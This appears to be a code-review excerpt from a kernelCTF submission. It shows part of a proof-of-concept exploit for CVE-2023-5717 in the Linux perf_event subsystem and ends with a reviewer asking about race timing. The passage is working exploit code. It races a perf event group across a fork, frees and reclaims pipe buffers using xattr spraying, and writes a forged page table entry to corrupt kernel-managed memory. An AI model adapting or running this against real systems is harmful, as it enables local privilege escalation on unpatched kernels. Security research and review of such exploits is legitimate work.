pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c

```diff
@@ -0,0 +1,643 @@
+    pe.type = PERF_TYPE_SOFTWARE;
+    pe.size = sizeof(pe);
+    pe.config = PERF_COUNT_SW_PAGE_FAULTS;
+    pe.disabled = 0;
+    pe.exclude_kernel = 1;
+    pe.exclude_hv = 1;
+    pe.inherit = 1;
+    pe.pinned = 0; 
+    ppid = getppid();
+    pid_t child_pid = fork();
+    if (child_pid == 0) {  
+        _pin_to_cpu(CPU_A);
+        sched_yield();
+
+        raise(SIGSTOP); // STOP -> keep parent and child ctx's generation same.
+        for (int i=0; i<512+511; i++) {
+            ioctl(siblings[i], PERF_EVENT_IOC_RESET, PERF_IOC_FLAG_GROUP);
+            ioctl(siblings[i], PERF_EVENT_IOC_ENABLE, 0);
+        }
+        if (close(siblings[100]) < 0) { 
+            perror("close failed");
+            exit(EXIT_FAILURE);
+        }   
+
+        // when scheduler swaps ctx, it migrates the counter to the next event.
+        // so child event's counter value must be refreshed 
+        page_fault_memory = (char *)mmap(NULL, 0x1000 * PAGE_FAULT_COUNT, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        for (int i=0; i < PAGE_FAULT_COUNT; i++) {
+            ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
+            page_fault_memory[0x1000 * i] = 0x41;
+            ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
+        }
+        uint64_t pte = 0x8000000000000067;
+
+        // this operation ensures that the pipe only uses the first element of the buffer array.
+        read(vuln_pipe[0], buf_pipe_reclaim, sizeof(buf_pipe_reclaim)); // release page & init tmp_page
+        resize_pipe(vuln_pipe[1], 0); // free
+        write(vuln_pipe[1], &pte, 8); // write 8bytes -> using tmp_page again & using newly reclaimed pipe_buffer
+        sprintf(xattr_name, "security.x12296_%d", race_layout_index + 1 + 16);
+        remove_xattr(xattr_name, 1);
+        resize_pipe(vuln_pipe[1], 0x1000 * 220);
+        sprintf(xattr_name, "security.x12296_%d", race_layout_index + 16);
+        sched_yield();
+        write(pipefd[1], race_sync_buf, 1); // sync point A
+
+        remove_xattr(xattr_name, 1);
+        for (int _=0; _<32; _++) {
+            read(group_leader, event_buf, sizeof(event_buf));
+        }
+        write(vuln_pipe[1], &pte, sizeof(pte));  
+        munmap(page_fault_memory, 0x1000 * 0x80);
+
+        exit(0);
+    }
+    else if (child_pid > 0) { // parent
+
+        race_layout_index += 2;
+        int tmp = perf_event_open(&pe, 0, CPU_A, -1, 0); 
+        close(tmp);
+        // this code seems useless but, this ensure that the process's ctx is no longer get swapped by scheduler.
+        // it's very important because the ownership of the group can be destroyed while child process exits.
+        // we have to keep the ownership away from being destroyed.
+        usleep(20000);
+        kill(child_pid, SIGCONT); // now we pinned the ownership. now child process is allowed to exit.
+
+        read(pipefd[0], race_sync_buf, 1); // sync point A
+		int r = MIN + rand() % (MAX - MIN + 1);
```

Comment:
Details this part a bit more. You are trying to hit the right timing for the race, right?